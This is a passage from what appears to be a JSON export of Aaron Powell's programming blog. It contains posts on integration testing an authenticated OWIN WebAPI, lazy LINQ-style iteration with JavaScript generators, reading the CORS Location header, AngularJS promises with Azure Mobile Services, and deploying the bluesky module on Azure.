first problem, being able to setup an integration test which ran our server.\nSide note: You may be thinking that because we’re using Self Host and not IIS (which is the production host) that we’ve got a similar problem to using IIS Express but I’d disagree. We’re still using the full WebAPI stack, we’re still using the full OWIN/Katana stack, we’re just not using IIS and you’re application should be none the wiser. If you’re application knows it’s running on IIS then I’d argue you have a bigger problem.\nHandling authenticationAs I said one of the main bridges we’d have to cross on this project was that all the API calls were to be authenticated, which means that when you’re running your tests you need to take that into account. So what do you do? Well you could write something to bypass the authentication for the test run, but then you’re integration test is no longer really representative.\nBut what you need to remember is that because you’re running your code through a self hosted WebAPI you’ve got the full WebAPI stack, so the [Authorize] attribute will be in effect so you’re going to actually have an authenticated request pipeline.\nOk, let’s take the starting point that Filip W gave us, and start expanding on it, I’m going to extract my server set up into its own base class:\npublic abstract class BaseServerTest { protected TestServer server; [TestInitialize] public void Setup() { server = TestServer.Create(app => { var startup = new Startup(); startup.ConfigureAuth(app); var config = new HttpConfiguration(); WebApiConfig.Register(config); app.UseWebApi(config); }); } [TestCleanup] public void Teardown() { if (server != null) server.Dispose(); } } So what we’ve got here is a call to create a new in-memory OWIN server, it’s using the Startup class that my WebAPI app would use, as well as the WebAPI configuration (so routes, filters, etc) are configured. Now I want to make it easier to handle the GET and POST methods. To do this I’m going to add an abstract property to represent the URI that the tests are for, and two method stubs:\nprotected abstract string Uri { get; } protected virtual async Task<HttpResponseMessage> GetAsync() { throw new NotImplementedException(); } protected virtual async Task<HttpResponseMessage> PostAsync<TModel>(TModel model) { throw new NotImplementedException } Now I’m going to quickly jump over to writing some integration tests for my user registration because well I’ll need to register a user before I can run and tests:\n[TestClass] public class AccountControllerTests : BaseServerTest { [TestMethod] public async Task CanRegisterUser() { } private string uriBase = "/api/account"; private string uri = string.Empty; protected override string Uri { get { return uri; } } } I’ve split the URI into two parts, there’s the URI base, being /api/account and the actual URI for the abstract class implementation. The reason for this is that (at least in the default WebAPI project template) the AccountController isn’t just a REST interface, but instead has multiple methods on it that I’ll want to hit (things like change password, login and so on which I won’t cover in this post). So let’s go ahead and implement the test method itself:\n[TestMethod] public async Task CanRegisterUser() { uri = uriBase + "/register"; var model = new RegisterBindingModel { UserName = "aaronpowell" + DateTimeOffset.Now.Ticks, Password = "password", ConfirmPassword = "password" }; var response = await PostAsync(model); Assert.AreEqual(HttpStatusCode.OK, response.StatusCode); } What am I doing here? I’m:\nSaying that this request is going to hit /api/account/register Using the model which the AccountContoller.Register method is taking as an input argument Calling my PostAsync method Asserting that we got a successful response Additionally you could write an assert that peaks into the database and validates that the user is there, but that’s an exercise for the reader.\nI really like that you can use the model from WebAPI to do the processing, this gives us the advantage of:\nType safety, if the class is refactored our test will also be refactored We leverage model binding and model validation Side note: You’ll notice I’m appending DateTimeOffset.Now.Ticks to the username, that’s because we need a unique username each time. Depending on whether you’re creating a new DB for each test run or not you may want to handle this better.\nSo how does our PostAsync work? Well let’s implement it:\nprotected virtual async Task<HttpResponseMessage> PostAsync<TModel>(TModel model) { return await server.CreateRequest(Uri) .And(request => request.Content = new ObjectContent(typeof(TModel), model, new JsonMediaTypeFormatter())) .PostAsync(); } Yep it’s really quite simple. You’ll see here that I’m grabbing the Uri property our class implements, which saves it being passed in, and then we’re just leveraging the methods available from the TestServer class to build up the request and eventually POST the content up. But how do we get the content up there? Well we leverage the And extension method which we have a lambda that can set properties on the request, in this case we setting the request content, serialized as JSON, but you can use any available MediaTypeFormatter so this can be nifty if you’re working with your own formatters.\nNow if we run our test it should pass with flying colours.\nMaking a GET We’ve got the POST sorted, what about GET? This time I’m going to go for the ValuesController (which comes in the default project template). Now this is an authenticated controller so we can start off with writing a test that if there’s no credentials we fail our test:\n[TestClass] public class ValuesControllerTests : BaseServerTest { [TestMethod] public async Task ShouldGetUnauthorizedWithoutLogin() { var response = await GetAsync(); Assert.AreEqual(HttpStatusCode.Unauthorized, response.StatusCode); } protected override string Uri { get { return "/api/values"; } } } So this Assert should make sense, no credentials, you get a 401 response. But what does the GetAsync method look like?\nprotected virtual async Task<HttpResponseMessage> GetAsync() { return await server.CreateRequest(Uri).GetAsync(); } Sorry, not very exciting is it! Really all we’re doing is nicely wrapping around the CreateRequest method call\nWhere’s the authentication?Right we’ve got a bunch of unauthenticated requests out of the way, now it’s time to look at how we can do some authenticated requests. For this I’m going to create another base class that extends our BaseServerTest:\npublic abstract class BaseAuthenticatedTests : BaseServerTest { protected virtual string Username { get { return "aaronpowell"; } } protected virtual string Password { get { return "password"; } } private string token; } For the authenticated tests I’m going to do them against a user that is known to exist, you could do it a bunch of different ways, like performing a registration for each test, that really comes down to how complex your registration process is.\nAlso I don’t want the author of authenticated tests to have to worry about the authentication side of things, it should just work for them. So to do this I’m going to extend my BaseServerTest class to all me to run something when the server is setup:\n[TestInitialize] public void Setup() { server = TestServer.Create(app => { var startup = new Startup(); startup.ConfigureAuth(app); var config = new HttpConfiguration(); WebApiConfig.Register(config); app.UseWebApi(config); }); PostSetup(server); } protected virtual void PostSetup(TestServer server) { } What I’ve added here is a virtual method PostSetup which is called when the server is ready and then we can do additional stuff. Let’s implement it in our BaseAuthenticatedTest:\nprotected override void PostSetup(TestServer server) { var tokenDetails = new List<KeyValuePair<string, string>>() { new KeyValuePair<string, string>("grant_type", "password"), new KeyValuePair<string, string>("username", Username), new KeyValuePair<string, string>("password", Password) }; var tokenPostData = new FormUrlEncodedContent(tokenDetails); var tokenResult = server.HttpClient.PostAsync("/Token", tokenPostData).Result; Assert.AreEqual(HttpStatusCode.OK, tokenResult.StatusCode); var body = JObject.Parse(tokenResult.Content.ReadAsStringAsync().Result); token = (string)body["access_token"]; } Alright, what we’re doing here is:\nCreating the details which are needed to be POSTed, this is the standard data you’d provide to an OAuth request URL Encode the data Hit the /Token route with the data Assert that it was a successful request Extract the token from the response, I’m just reading it out as JSON (which it is) and not worrying about strongly typing it Side note - you’ll notice that I’m using PostAsync(...).Result and not async & await. The reason for this is a limitation in MSTest (and NUnit), you’re setup can’t have a return type (ie - async Task) so you’re stuck with async void which gets dodgy quickly. It’s easier to just do it synchronously.\nWith our authentication written now we need to make sure that we are passing it through on the request:\nprotected override async Task<HttpResponseMessage> GetAsync() { return await server.CreateRequest(Uri) .AddHeader("Authorization", "Bearer " + token) .GetAsync(); } Really the only difference is that the GetAsync (and PostAsync) is that we add the Authorization header and properly format it to contain our bearer token.\nEasy, we can now write a test like so:\n[TestClass] public class ValuesAuthenticatedControllerTests : BaseAuthenticatedTests { [TestMethod] public async Task ShouldGetValuesWhenAuthenticated() { var response = await GetAsync(); var values = await response.Content.ReadAsAsync<IEnumerable<string>>(); Assert.AreEqual(2, values.Count()); } protected override string Uri { get { return "/api/values"; } } } And we’re done!\nConclusionSo through this post we’ve seen how we can use OWIN/Katana’s self-hosting feature to host itself and then make requests against and authenticated API. We’ve also abstracted away the authentication part of our integration tests so we don’t need to think about it for each test which we write.\nI’ve published the code used for this blog here on GitHub so feel free to get it and have a play.\n", "id": "2014-01-12-integration-testing-katana-with-auth" }, { "title": "LINQ in JavaScript, ES6 style, for real this time", "url": "https://www.aaron-powell.com/posts/2013-12-31-linq-in-javascript-for-real/", "date": "Tue, 31 Dec 2013 00:00:00 +0000", "tags": [ "javascript", "linq", "es6" ], "description": "Revisiting how to implement LINQ in JavaScript on top of ES6 but this time it's actually going to be on top of ES6 features!", "content": "In a recent post I talked about writing LINQ in JavaScript using ES6 iterators but then had to take my words back after it was pointed out to me that I wasn’t actually using ES6 generators.\nWell some time has past and I’ve reworked my previous library to actually use the iterators and generators from ES6, so let’s have a look at how to get going with it.\nLazy evaluating collectionsLet’s start simple, let’s take an array and make it lazy evaluated. To do this I’m going to create a generator function that deals with the iterations through the array:\nlet lazyArray = function* (...args) { for (let i = 0; i < args.length; i++) { yield args[i]; } }; There’s a few new things here to look at:\nfunction* - this is a new syntax as part of ES6 and what it is doing is telling the JavaScript runtime that this function is a genreator function. This is important if we want to use yield to return values as yield (and yield* which I won’t be covering) can only be used inside a generator function. Side note: At the time of writing Firefox Nightly allows you to use yield outside of generator functions, yay bleeding edge! ...args - I’ve used this mostly for convenience, splats are coming in ES6 and it’s so much easier to get arguments as arrays this way let - as you should know JavaScript is function scoped not block scoped (which C# is) so when you declare a variable, regardless of where you declare it, it’ll always be available in the function. Well that was before we had ES6 and let. let allows you to create block scoped variables and as I play with more ES6 I find that I prefer to use let over var for declaring variables as it brings a more sane scope to what I’m declaring Now let’s use it:\nlet arr = lazyArray(0,1,2,3,4,5,6,7,8,9); Awesome, we’ve got our lazy array, not quite as nice as using [0,1,2,3...], but it’s acceptable, so now we can do stuff with it, like read the values out:\nfor (let x of arr) { console.log(x); } Again we’re seeing some new syntax, this time in the form of a for-of statement. This is used to iterate through the results of a generator function. Since this function is lazy evaluated we don’t have array indexers or anything on it, instead we have a next method which tells it we want the next iteration of the function which is similar to IEnumerator and it’s MoveNext method. In fact we could write something like this:\nconsole.log(arr.next().value); //0 console.log(arr.next().value); //1 //and so on The result of next() returns us an object like so:\n{ done: true|false, value: value|undefined } So to decompose our for-of look it’s more like this:\nlet x; while (!(x = arr.next()).done) { console.log(x.value); } What we’re saying is “While the generator isn’t done get the next and output the value”. Personally I think the for-of syntax is much nicer, but there’s advantaged to accessing items at your choosing, just like using the IEnumerator interface in C# has its advantages.\nBuilding filtering for our generator functionThe problem with our lazyArray is that we have no way which we would be able to filter it, although it’s array like it’s not an array and we can’t make it an array without loosing our lazy evaluation. So instead we’ll start augmenting the function prototype:\nlazyArray.prototype.where = function* (fn) { for (let item of this) { if (fn(item)) { yield item; } } }; This works in a very smooth fashion, you’ll see that we’re doing for (let item of this), that’s because we’re augmenting a generator function, so we are lazy evaluating our “parent” collection, we can just for-of loop over that.\nAnd ultimately what it means is we can do this:\nfor (let x of arr.where(i => i % 2)) { console.log(x); } //Note: I'm using the fat arrow syntax from ES6 to make it more lambda-esq, but you can use a "normal function" instead. Sweet, we’re filtering down to only items that are odd numbers!\nTransforming the itemsWhat’s filter without map (well… where without select)? Again that’s pretty easy to add by just augmenting our lazyArray prototype:\nlazyArray.prototype.select = function* (fn) { for (let item of this) { yield fn(item); } }; So we could do something like creating squares of everything:\nfor (let x of arr.select(i => i * i)) { console.log(x); } ChainingNow being able to do a single manipulation on a collection that is lazy is good, but really you’re more likely to do a filter then a map, well let’s go ahead:\nfor (let x of arr.where(i => i % 2).select(i => i * i)) { console.log(x); } Hmm that’s a syntax error, apparently our where function doesn’t have a select method, well you’d be right on spotting that. The reason is we’ve been manipulating the lazyArray prototype, but we also need to manipulate the prototype of these new functions too, but to do that we’ll have to assign them to variables rather than having them as anonymous functions:\nlet where = function* where(fn) { for (let item of this) { if (fn(item)) yield item; } }; let select = function* select(fn) { for (let item of this) { yield fn(item); } }; lazyArray.prototype.where = where; lazyArray.prototype.select = select; where.prototype.select = select; where.prototype.where = where; select.prototype.where = where; select.prototype.select = select; And then we can:\nfor (let x of arr.where(i => i % 2).select(i => i * i)) { console.log(x); } Or even:\nfor (let x of arr.select(i => i * i).select(i => i * i)) { console.log(x); } Now using your imagination you can see how other LINQ methods can be implemented.\nMultiple enumerationsNow this is where it’ll get tricky, unlike C# JavaScript generator functions can’t be iterated over multiple times, once a generator is spent it’s spent. This will be a problem if you want to do something like this:\nif (arr.any()) { for (let x of arr) { //stuff } } For an any() to work you need to walk the generator, but when you’ve walked it once you can’t walk it again, so how can do address that? The easiest way is to do what ReSharper suggests to me all the time in C#, get the collection in to an array, but doing so looses the laziness of our collection.\nInstead what I’ve done with LINQ in JavaScript is wrapped the enumerable in another function so you have to invoke it to get the generator, like so:\nif (arr.any()) { for (let x of arr()) { //stuff } } So our arr object is actually a non-generator function and you have to invoke it to use walk it, but to make it nicer to work with I’ve made functions like any() take care of that for you so you don’t have to arr().any() as I think that’d be a code smell. But this does mean that the result of a call to where or select will need to be invoked like so:\nfor (let item of arr.where(x => x % 2)()) { console.log(item); } But really I’m of the opinion you shouldn’t be doing your lambda expressions inside of the for-of declaration anyway so I think that it’s fine.\nWrapping upWell there we have it, how we can use ES6 generators to create LINQ in JavaScript which is actually lazy evaluated. I’ve gone ahread and published the code which I’ve been working on to my GitHub repo and you can also get it via npm if you’re using Node.js 0.11.4 or higher (and turn on the harmony features of v8). So go one, check out the tests for some fun examples of what you can do like:\ndescribe('Interesting API usages', function () { it('should calc prime numbers', function () { var range = Enumerable.range(3, 10); var primes = range.where(n => Enumerable.range(2, Math.floor(Math.sqrt(n))).all(i => n % i > 0)); var expectedPrimes = [3, 5, 7]; var index = 0; for (let prime of primes()) { expect(prime).to.equal(expectedPrimes[index]); index++; } }); }); ", "id": "2013-12-31-linq-in-javascript-for-real" }, { "title": "Accessing the Location header in a CORS-enabled API", "url": "https://www.aaron-powell.com/posts/2013-11-28-accessing-location-header-in-cors-response/", "date": "Thu, 28 Nov 2013 00:00:00 +0000", "tags": [ "asp-net", "ajax", "cors" ], "description": "Dealing with the case of the missing Location header in an ASP.Net WebAPI response.", "content": "Today I hit a problem, we’ve got an ASP.Net WebAPI 2 project which is providing a series of REST services for a web app. These services are hosted on a different domain to the app will be hosted on so to perform the requests to them we’ve gone ahead and enabled CORS.\nUp until now most of our work has been doing read-only endpoints in the API, but I just finished off implementing a POST route. Now in a RESTful API a POST should return a 201 Created response along with the location which which you’ll find the newly created resource. So in WebAPI I have something like this:\nvar response = Request.CreateResponse(HttpStatusCode.OK, createdItemId); response.Headers.Location = new Uri(Url.Link("SomeRoutes", new { id = createdItem })); Which sees me having a Location header in my response.\nNext I want to read out the Location header and then follow it to get the data and display it on screen. I’m using AngularJS for this but the principle is the same for any way you’re performing an AJAX request:\n$http.post(someUrl, someData) .then(function (response) { var location = response.headers('Location'); return $http.get(location); }) .then(function (response) { console.dir(response.data); }); Only there’s a problem, location is always undefined! I’m looking in my network tab in the dev tools and I can clearly see that there is a Location header returned but when I try and read it in JavaScript it’s never there.\nFrustrated I turned to the googles and was not having much luck, everyone just said response.headers('Location') and you’ll have your header, but I was never seeing it from Angular, or even in the raw xhr object. Something must be wrong.\nAfter some more digging I came across this. Little did I know that if you’re enabling CORS it will only expose a small number of the available headers by default, if you want more you have to expose them.\nSo back to our WebAPI controller action I added the following:\nvar corsResult = new CorsResult(); corsResult.AllowedExposedHeaders.Add("Location"); response.WriteCorsHeaders(corsResult); My API is already CORS enabled, all I’m doing is telling it that it’s a CORS response and I want some additional headers exposed cross-origin.\nAnd now I’m able to read my Location header in JavaScript.\n", "id": "2013-11-28-accessing-location-header-in-cors-response" }, { "title": "Azure Mobile Services, AngularJS and broken promises", "url": "https://www.aaron-powell.com/posts/2013-09-16-azure-angular-and-broken-promises/", "date": "Mon, 16 Sep 2013 00:00:00 +0000", "tags": [ "azure-mobile-services", "angularjs", "promise" ], "description": "A look at how to use Azure Mobile Services with AngularJS and dealing with what I believe is a broken approach to the AngularJS promise API.", "content": "There’s no denying it that AngularJS is the hot new SPA framework these days as it offers a lot of very nice features out of the box, has a very good programming model behind it and works as advertised. So when a new project was kicking off that I was on I decided to take the opportunity to use it so I could get a feel for it. Overall my feelings have been positive with the exception of what I want to talk about here.\nBringing in Azure Mobile ServicesFor this project I’ve been working with Azure Mobile Services as I’ve got data coming from some native mobile apps that needs to be managed via the website. So AMS has its own JavaScript client to work with that’s quite a nice little library, you do things like so:\nclient.getTable('members').insert(newMember).then(function () { console.log('member has been inserted with id: ' + newMmeber.id) }); client.getTable('members').where(function () { return this.active; }).read().then(function (members) { console.log('You have ' + members.length + ' active members'); }); Under the covers this is a REST API so it’s doing HTTP requests out to Azure, handling the response and then using its own Promise API (which conforms to the Promise spec) to publish out to listeners.\nAbstracting Azure Mobile ServicesAngularJS has support for dependency injection which is a really nice feature when you’re looking to modularize your project. So for this project I decided to create a factory which would expose AMS and then another which would expose friendly methods to wrap up the bits of functionality I wanted, meaning that if you were to unit test it you wouldn’t directly depend on AMS, just an interface.\nSo I started with this as a module:\nangular.module('azure', []) .factory('client', ['$window', function ($window) { var azureSettings = //get them how you will var client = new $window.WindowsAzure.MobileServiceClient( "https://" + azureSettings.name + ".azure-mobile.net/", azureSettings.key ); return client; }]); And now I can create a factory for my “services”, so we’ll start with this:\nangular.module('api', ['azure']) .factory('services', ['client', function (client) { //TODO }]); Lastly I could setup a controller:\nangular.module('app', ['api']) .controller('MyController', ['$scope', 'services', function ($scope, services) { }]); Now we can set about creating our service. We’ll do your typical todo item app, so for that I want to have a method on my service that’ll expose all todo items:\nangular.module('api', ['azure']) .factory('services', ['client', function (client) { return { getAll: function () { return client.getTable('todo').read(); } }; }]); Because this is promise based we can .then the call and populate our UI:\nangular.module('app', ['api']) .controller('MyController', ['$scope', 'services', function ($scope, services) { $scope.items = []; services.getAll().then(function (items) { $scope.items = items; }); }]); AngularJS’s broken promiseI quite like the concept of Promises in JavaScript, and I know some people have issues with them, but all-in-all it’s nicer to work with than callback trees, especially when it comes to working with multiple async operations. One of the core principles is that when the operation completes it will either be resolved or rejected and you can provide handlers for the appropriate states.\nLooking back at the code up there, knowing that Azure Mobile Services will return a promise do you see anything wrong in the either the service or the controller which would prevent the success callback from being invoked?\nNo? Me either, but it won’t be called.\nAnd this is where we get to what I’m referring to as AngularJS’s broken promise. The fact is that the callback won’t be run, and that’s rather annoying, really hard to debug and not obvious at all.\nBefore we go much further I just want to clarify that I’m not an AngularJS expert, I’ve been using it for a grand total of 3 weeks so this is based on my expectations as a JavaScript developer.\nEverything in AngularJS is wrapped up in scopes and only within the space of a running scope can you interact with an AngularJS model (such as your controller). Anything that breaks out of an AngularJS scope will then need to notify AngularJS that it’s completed and you can be on your way.\nSo the problem that I’m hitting is that I’m creating an XHR, which because it’s asynchronous, will break out of an AngularJS scope and eventually complete. Because you are then “out of the scope” the Promise callbacks are somehow blocked by AngularJS (I’ve not been able to work out how they prevent it from firing but they somehow do).\nFixing the broken promise The good news is that you can work around this and I’ll admit that this may not be the cleanest solution because it was determined by trial-and-error, but none the less you can solve the problem and that’s by calling $apply on the root scope before your promise tries to return. Annoyingly this means you have to create your own promise to wrap the AMS promise but AngularJS does ship with a slimmed down version of Q in the form of $q.\nThe resulting code now looks like this:\nangular.module('api', ['azure']) .factory('services', ['client', '$q', '$rootScope', function (client, $q, $rootScope) { return { getAll: function () { var d = $q.defer(); client.getTable('todo').read().then(function () { d.resolve.apply(this, arguments); $rootScope.$apply(); }, function () { d.reject.apply(this, arguments); $rootScope.$apply(); }); return d.promise(). } }; }]); Here you’ll see that we’re creating a deferred object, and then returning its promise (meaning our controller doesn’t need to be refactored, just our factory). We then add our own success handler (and fail handler) which pass through to .resolve and .reject for success and fail, providing the arguments, meaning that this solution doesn’t need to know about the argument changes. Once that’s done we then call $rootScope.$apply() which will inform AngularJS that our async operation has completed, and now the handlers in our controller will be executed.\nBeware of opinionated frameworksSo the main problem I was experiencing was supped up in this tweet:\n@slace normally, you wouldn't need to do this as a digest cycle would be triggered by angular if you were using its own services.\n— James Sadler (@freshtonic) August 23, 2013 The problem is you’re not doing in the AngularJS way. When I was trying to work out why it wasn’t working people kept pointing out that “if you just used the built in $http service you wouldn’t have that problem”. But really that’s not the case, using the $http service just handles it for you, so it’s still a problem with any XHR operations in AngularJS, they just hide some of it from you.\nSo just be aware that when you’re using an opinionated library once you step outside “the norm” be prepared for things to not work as you’d expect.\nConclusionI’d really like to create a wrapper around the Azure Mobile Services API but they don’t seem to expose their promise API which is where I’d like to wrap, I’m going to keep trying and will update if I can find a cleaner solution.\nIn the mean time you’ll need to be aware that when you’re using Azure Mobile Services with AngularJS it’s not quite as simple as you’d expect it to be.\n", "id": "2013-09-16-azure-angular-and-broken-promises" }, { "title": "LINQ in JavaScript, ES6 style clarification", "url": "https://www.aaron-powell.com/posts/2013-09-16-linq-in-javascript-es6-clarification/", "date": "Mon, 16 Sep 2013 00:00:00 +0000", "tags": [ "javascript", "linq", "es6" ], "description": "A quick clarification on my previous post about LINQ in JavaScript using ES6 features.", "content": "I recently blogged about implementing LINQ in JavaScript with ES6 iterators. While I’d done a bunch of research, played around with FireFox (which seemed to have the most up-to-date implementation) and thought it was all well and good.\nUnfortunately it turns out that what I was talking about was the __iterator__ syntax which FireFox has implemented but it’s not in line with the current iterator and generator approach.\nSo while I did state that the code was against an API that wasn’t set in stone I was a bit further away from where I wanted to be going forward.\nThanks Domenic for picking up on it and pointing me in the right direction, I’m in the process of reworking the library to work with what’s actually outlined so far in ES6 and you can check out the progress.\n", "id": "2013-09-16-linq-in-javascript-es6-clarification" }, { "title": "Using bluesky in Azure Mobile Services", "url": "https://www.aaron-powell.com/posts/2013-09-11-using-bluesky-in-azure-mobile-services/", "date": "Wed, 11 Sep 2013 00:00:00 +0000", "tags": [ "azure-mobile-services" ], "description": "A quick tip on how to use `bluesky` from Azure Mobile Services.", "content": "I’ve been doing some work with Azure Mobile Services where I’m storing data in tables and blobs. For a task I need to have a custom API which will remove some data from a table and then the blobs associated with it.\nFor this I’m creating a new custom API and because it’s just a Node.js app I’d be using the Node SDK. When I was getting started I got pointed towards bluesky which is a nice little wrapper around the Azure SDK to make it a bit easier to work with.\nSo I npm install‘ed it into the git repo for my mobile service, used the API and pushed it up to Azure.\nAnd then…\nremote: One or more errors occurred. remote: Error - Changes committed to remote repository but deployment to website failed, please check log for further details. Well I spun up the CLI and check my logs but nothing, there wasn’t anything in there that indicated the problem. In fact my server was still running but it wasn’t running the scripts that I’d just pushed. This is annoying, I’ve got no logs, a failing server and no indication as to why. Deleting the module and pushing the server started up again, but then obviously then I can’t use the module.\nI put the question to my friend Glenn Block as he pointed me to the library to see if he knew what the problem might be, or at least how to find the logs. He suggested that the problem might be due to the path length, Windows has limitations on the length of the file paths, and when you start looking at the dependency graph for the module it gets crazy, in particular because it takes a dependency on the Azure SDK (which in turn has its own dependency chain each with dependencies, and so on).\nAfter some investigation it turned out that if you don’t include the Azure SDK dependency then it deploys fine, bluesky doesn’t work, but at least the deployment works… Baby steps ;).\nSo how do we work around that? It struck me that when you’ve got these scripts deployed to your AMS instance the Azure SDK is already available, you don’t need to include it in your repository, you just do:\nvar azure = require('azure'); And you have the SDK at your finger tips.\nNow, conveniently bluesky takes this into account already! Rather than passing your credentials in like so:\nvar storage = require('bluesky').storage({ account: '...', key: '...' }); You can provide it with Azure services:\nvar azure = require('azure'); var storage = require('bluesky').storage({ blobService: azure.createBlobService('account', 'key').withFilter(new azure.LinearRetryPolicyFilter()), tableService: azure.createTableService('account', 'key').withFilter(new azure.LinearRetryPolicyFilter()), queueService = azure.createQueueService('account', 'key').withFilter(new azure.LinearRetryPolicyFilter()) }); And there we have it, we can use the Azure SDK that’s already on the server and avoid the path depth problem.\n", "id": "2013-09-11-using-bluesky-in-azure-mobile-services" }, { "title": "LINQ in JavaScript, ES6 style", "url": "https://www.aaron-powell.com/posts/2013-09-06-linq-in-javascript-es6/", "date": "Fri, 06 Sep 2013 00:00:00 +0000", "tags": [ "javascript", "linq", "es6" ], "description": "It's been a few years since I last blogged about the concept of LINQ in JavaScript as a lot has changed in the JavaScript landscape.\n\nSo let's revisit the idea of it with a look at how you could leverage LINQ in JavaScript for ES6.", "content": "Update #1 The code I’ve talked about here isn’t actually ES6 related, instead it’s about an API only in FireFox, read more here.\nBack in 2010 I posted about implementing LINQ in JavaScript in which I had a look at what would have been involved if you were writing a LINQ style API in JavaScript. Keep in mind that back in 2010 we didn’t have libraries like Underscore or LoDash nor were people that aware of the Array.prototype extensions map/filter/reduce. So when it came to collection manipulation the most common approach was via the good ol’ for loop but as I’ve said in the past for loops are uncool.\nBut with my implementation of LINQ in JavaScript, and the others out there that I’ve come across (including Underscore/LoDash) there is one thing that always annoyed me, they are eager evaluated.\nLet’s say you’re displaying a paged list of records, and also have custom filters that people can apply. So we’d need to do three things for this:\nApply a filter to a collection Transform a collection of objects to a collection of DOM elements (or DOM strings) Grab the subset of records required This would result in something like this:\nvar rows = people.filter(function (person) { return person.age > 30; }).map(function (person) { //removed for simplicity }).slice(0, 5); So this has to be eager evaluated, if we’ve got 500 records in our people collection and 250 of them are going to match the filter we still have to process all 500 in the filter, then 250 in the map’s before we take the 5 that we want to show on the current page. Now admittedly we can move the .slice(0, 5) to before the map and then we’d map the subset but you still go into the slice having put the whole collection through the filter.\nAnd this is where I like LINQ, it’s lazy evaluated, if we did the same thing:\nvar rows = people .Where(person => person.Age > 30) .Select(person => /* removed for simplicity */) .Take(5); Here the collection manipulation is processed only once you iterate over it rows, and only the first 5 that match the Where filter will be used, it will stop once it hits that. And this all comes down to the fact that C# implements Iterators through the IEnumerable interface.\nEnter ES6 Good news everybody, ECMAScript 6 has a proposal forward to add iterators to ECMAScript/JavaScript which means we can create lazy evaluated objects, more specifically, lazy evaluated collections.\nNote: This is a draft spec so what I’m doing only works in Firefox Nightly and may stop working at some random point.\nTo create an iterator object you need to add a member of __iterator__ that is a function that yields a result, here’s a basic iterator:\nvar iterator = { __iterator__: function () { yield 1; yield 2: yield 3; } }; We can then iterate over it using a for-in loop like so:\nfor (let val in iterator) { console.log(val); } // 1, 2, 3 You could then make an iterater version of an array:\nvar iteratableArray = function (array) { return { __iterator__: function () { for (let i = 0; i < array.length; i++) { yield array[i]; } } }; }; So now you can do nothing really any different:\nvar arr = iteratableArray([1, 2, 3, 4]); for (let val in arr) { console.log(val); } But where it gets really powerful is in the lazy evaluation, let’s update to if we have a function passed in we’ll return the evaluation of it:\nvar iteratableArray = function (array) { return { __iterator__: function () { for (let i = 0; i < array.length; i++) { if (typeof array[i] == 'function') yield array[i](); else yield array[i]; } } }; }; Now we’ll create our object:\nvar arr = iteratableArray([function () { throw 'Bad'; }]); The exception won’t be thrown until we iterate through the collection:\nfor (var x in arr) { console.log(x); } (Yes it’s a contrived example but we’ll move on from that.)\nImplementing LINQNow we’ve seen the basics of how you would create something that’s an iterable collection, and this is the basis of how we could implement LINQ. For this I’m going to create an Enumerable type that we’ll work against:\nvar Enumerable = function (array) { if (typeof this === 'undefined' || this.constructor !== Enumerable) { return new Enumerable(array); } this._array = array; }; This is a constructor function (that doesn’t have to be used with the new operator) that we’ll pass an array in (I’m not doing error checking at the moment, be nice :P).\nI’ve then got an __iterator__ function:\nvar __iterator__ = function() { for (var i = 0; i < this._array.length; i++) { yield this._array[i]; }; }; Which is then added to the Enumerable’s prototype:\nEnumerable.prototype.__iterator__ = __iterator__; And it works the same as our previous function, now we can start implementing more methods on the prototype. Let’s start with the Where method so we can filter the collection:\nvar where = function (fn) { return new WhereEnumerable(this, fn); }; Enumerable.prototype.where = where; Enumerable.prototype.filter = where; //just so it's more JavaScript-y Wait, what’s this WhereEnumerable that we’re creating? Well since we want to chain this up and not have a really complex object that we keep modifying I’ve created another “class” to handle the filtering concept. This is similar to what LINQ does, it has a number of internal types that handle the different iterator concepts. Let’s start implementing it:\nvar WhereEnumerable = (function (__super) { __extends(WhereEnumerable, __super); function WhereEnumerable(enumerable, fn) { __super.call(this, enumerable._array); this._enumerable = enumerable; this._fn = fn; }; return WhereEnumerable; })(Enumerable); I’m using one of the fairly common class patterns in JavaScript and I was lazy and grabbed some auto-generated code from a TypeScript project for doing class inheritance, but basically what I’m doing is:\nCreating a new constructor function that will invoke the Enumerable constructor function Capture the “parent” enumerable object Store the filtering function Now we’d better implement the __iterator__ method:\nWhereEnumerable.prototype.__iterator__ = function() { var index = 0; for (let item in this._enumerable) { if (this._fn(item, index)) { yield item; } index++; } }; It’s a pretty simple method to understand we:\nUse a for-in loop to step through each value of the parent enumerable Apply the function to the value and it’s index If the function returns truthy yield the item, else skip it Neat now we can do this:\nvar enumerable = Enumerable([1, 2, 3, 4]); var odds = enumerable.where(x => x % 2); Now we have an unevaluated collection filter, and until we step into the collection it’ll stay that way.\nStepping it up with chainingThe really powerful aspect of LINQ is its chaining capability, that you can apply multiple “query” operations to get a result, like our original example. So now let’s add a Count method:\nvar count = function () { var count = 0; for (let item in this) { count++; } return count; }; Enumerable.prototype.count = count; This means we could do this:\nconsole.log(enumerable.count()); //4 console.log(odds.count()); //2 Because our WhereEnumerable type inherits from the Enumerable class, when we augment that prototype it filters through. Neat! Now we could even do this:\nvar notOne = odds.where(x => x > 1); console.log(notOne.count()); //1 And if you were to debug through it keeps doing the __iterator__ method for the parent Enumerable object, meaning it’ll ask for 1, pass it to the initial filter, x => x % 2 and then to x => x > 1 since it passed the first where call. The next item through will fail the first where and won’t be passed to the second. Neat!\nSelectSay we want to implement Select (which is map in JavaScript land), again I’m creating a new Enumerable subclass:\nvar SelectEnumerable = (function (__super) { __extends(SelectEnumerable, __super); function SelectEnumerable(enumerable, fn) { __super.call(this, enumerable._array); this._enumerable = enumerable; this._fn = fn; }; SelectEnumerable.prototype.__iterator__ = function () { var index = 0; for (var item in this._enumerable) { yeild this._fn(item, index++); } }; return SelectEnumerable; })(Enumerable); It’s very similar to the WhereEnumeratable but we’re returning the result of the provided function. Once added to the Enumerable prototype it means we can do this:\nvar squares = enumerable.select(x => x ^ x); var oddSquares = enumerable.where(x => x % 2).select(x => x ^ x); .AllNot all of the methods we’d want to implement are going to require a new subclass to be made, something like All, which returns whether or not every item in the Enumerable matches the predicate, will evaluate immediately. It’s reasonably simple to implement as well:\nvar all = function (fn) { for (let x in this) { if (!fn(x)) { return false; } } return true; }; Enumerable.prototype.all = all; Here it’ll go over each item and if any of them fail the function it’ll return false, otherwise it’s true. Because we’re using a for-in loop against the this, which is an Enumerable (or subclass of) we step back through all the previous points in the chain.\nBringing it all togetherSo now that we’ve got a bunch of lazy evaluation available we could do something like this:\nvar range = Enumerable.range(100, 1000); var primes = range.where(n => Enumerable.range(2, Math.floor(Math.sqrt(n))).all(i => n % i > 0)); for (let prime in primes) { console.log(prime); } That’s a simple prime number generate, using some more extensions that will generate a range between two numbers (100 and 1000). 